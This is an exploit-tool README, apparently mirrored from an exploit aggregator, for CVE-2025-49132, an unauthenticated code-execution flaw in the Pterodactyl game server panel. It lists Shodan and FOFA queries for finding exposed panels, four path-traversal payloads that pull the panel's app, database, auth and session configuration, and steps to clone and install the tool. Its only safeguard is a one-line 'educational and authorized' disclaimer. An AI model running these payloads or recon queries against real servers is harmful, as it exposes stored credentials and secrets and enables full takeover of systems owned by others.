## https://sploitus.com/exploit?id=F6DED4B3-0BF1-5472-8007-CA2E2BD30D87
# CVE-2025-49132 โ Pterodactyl RCE
> Exploit tool for **CVE-2025-49132** โ a critical unauthenticated arbitrary code execution vulnerability affecting the **Pterodactyl** game server panel.
---
## ๐ง What is CVE-2025-49132 ?
A critical ACE flaw in the Pterodactyl panel that allows **unauthenticated remote attackers** to execute arbitrary code โ potentially leading to **full system compromise**.
No auth needed. Just a vulnerable instance.
---
## โ ๏ธ Disclaimer
For **educational and authorized pentesting purposes only.**
---
## ๐ Reconnaissance
**Shodan**
```
http.title:"Pterodactyl"
```
**FOFA**
```
"Pterodactyl"
```
---
## ๐ Payloads
```
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
```
---
## ๐ฆ Installation
```bash
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
```
---
## ๐ฏ Affected Software
| Software | Status |
|---|---|
| Pterodactyl Panel |
---
## ๐ References
- [NVD - CVE-2025-49132](https://nvd.nist.gov/vuln/detail/CVE-2025-49132)
- [Pterodactyl](https://pterodactyl.io)